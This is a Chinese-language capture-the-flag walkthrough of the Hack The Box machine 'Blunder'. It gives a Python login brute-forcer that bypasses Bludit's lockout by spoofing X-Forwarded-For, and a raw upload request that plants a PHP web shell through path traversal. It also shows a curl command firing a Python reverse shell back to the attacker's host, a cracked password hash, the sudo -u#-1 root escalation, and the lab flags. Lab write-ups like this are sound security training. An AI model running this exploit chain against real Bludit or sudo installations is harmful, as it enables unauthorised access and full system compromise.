信息收集
IP Address | Opening Ports |
---|---|
10.10.10.191 | TCP:80 |
$ nmap -p- 10.10.10.191 --min-rate 1000 -sC -sV
bash
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Blunder
|_http-title: Blunder | A blunder of interesting facts
|_http-server-header: Apache/2.4.41 (Ubuntu)
www-data 权限
data:image/s3,"s3://crabby-images/311e3/311e3d3f9f65ed506a7400db5c632a503219e016" alt=""
$ gobuster dir -u "http://10.10.10.191/" -w /usr/share/seclists/Discovery/Web-Content/raft-small-words.txt -x txt,php -b 404,403 -t 50
data:image/s3,"s3://crabby-images/1ea5a/1ea5a1890af6386cc101673a006b607cbc5a2f99" alt=""
http://10.10.10.191/todo.txt
data:image/s3,"s3://crabby-images/6d8c1/6d8c17c6b98b97ecbc534a17682df794d732aaef" alt=""
username:fergus
$ cewl 10.10.10.191 > pass.txt
python
#!/usr/bin/env python3
import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
with open('pass.txt', 'r') as words:
for line in words:
line = line.rstrip()
wordlist.append(line)
for password in wordlist:
session = requests.Session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)
print('[*] Trying: {p}'.format(p=password))
headers = {
'X-Forwarded-For': password,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
'Referer': login_url
}
data = {
'tokenCSRF': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers=headers, data=data, allow_redirects=False)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('SUCCESS: Password found!')
print('Use {u}:{p} to login.'.format(u=username, p=password))
print()
break
$ python3 exp.py
data:image/s3,"s3://crabby-images/897e4/897e4d006394c331ee925b84395ffefbfba2d4fb" alt=""
Password:RolandDeschain
data:image/s3,"s3://crabby-images/ea6f2/ea6f2a7b110fbda045c61b7a6c5083e2f913d93f" alt=""
https://github.com/bludit/bludit/issues/1081
data:image/s3,"s3://crabby-images/79e6e/79e6e107214e5259f176e766adb70274f0664205" alt=""
data:image/s3,"s3://crabby-images/94881/94881c4d5bbc1709dbd24fa8dea8e54ffdb672dd" alt=""
bash
POST /admin/ajax/upload-images HTTP/1.1
Host: 10.10.10.191
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------423763520129402281753554177338
Content-Length: 173373
Origin: http://10.10.10.191
Connection: close
Referer: http://10.10.10.191/admin/new-content
Cookie: BLUDIT-KEY=7vn276oblmdb0l4kt4n3sltkl5
-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="images[]"; filename="TEAM.php"
Content-Type: image/png
<?=phpinfo();system($_GET[0]);?>
-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="uuid"
../../tmp
-----------------------------423763520129402281753554177338
Content-Disposition: form-data; name="tokenCSRF"
96062fa2efef00e52320951d57034af3a4f480f4
-----------------------------423763520129402281753554177338--
data:image/s3,"s3://crabby-images/1ea5a/1ea5a1890af6386cc101673a006b607cbc5a2f99" alt=""
data:image/s3,"s3://crabby-images/1ea5a/1ea5a1890af6386cc101673a006b607cbc5a2f99" alt=""
$ curl "http://10.10.10.191/bl-content/tmp/TEAM.php?0=python%20-c%20'import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.16.6%22%2C10032))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bimport%20pty%3B%20pty.spawn(%22%2Fbin%2Fsh%22)'"
data:image/s3,"s3://crabby-images/765a6/765a60021f9b596ab91e56a8e70b9771cd7dbfcf" alt=""
User 权限
$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
data:image/s3,"s3://crabby-images/0e518/0e51826819c50d8eefda5f54586856d8488d24ef" alt=""
username:hugo
hash:faca404fd5c0a31cf1897b823c695c85cffeb98d
https://md5decrypt.net/en/Sha1/
!
password:Password120
data:image/s3,"s3://crabby-images/b5324/b5324b0e557c64da8726d40048515416bb062371" alt=""
User.txt
$ cat /home/hugo/user.txt
cb37fd3c2e81e209769763b3fd001348
权限提升
data:image/s3,"s3://crabby-images/76cb5/76cb5838088a2c79c73efd7ee7a67e20e9d6a8d9" alt=""
$ sudo --version
data:image/s3,"s3://crabby-images/bc4ae/bc4aec80f52b3807b56a58a69e875506fe31dfe8" alt=""
data:image/s3,"s3://crabby-images/cf8a7/cf8a7bc9996c8b9d431ffb206a82b4fb926342bb" alt=""
$ sudo -u#-1 /bin/bash
data:image/s3,"s3://crabby-images/49c17/49c17b3a77f185062b23623e47d87ae75885401a" alt=""
Root.txt
# cat /root/root.txt
d10d349c006d7beb3e00cf067fba123d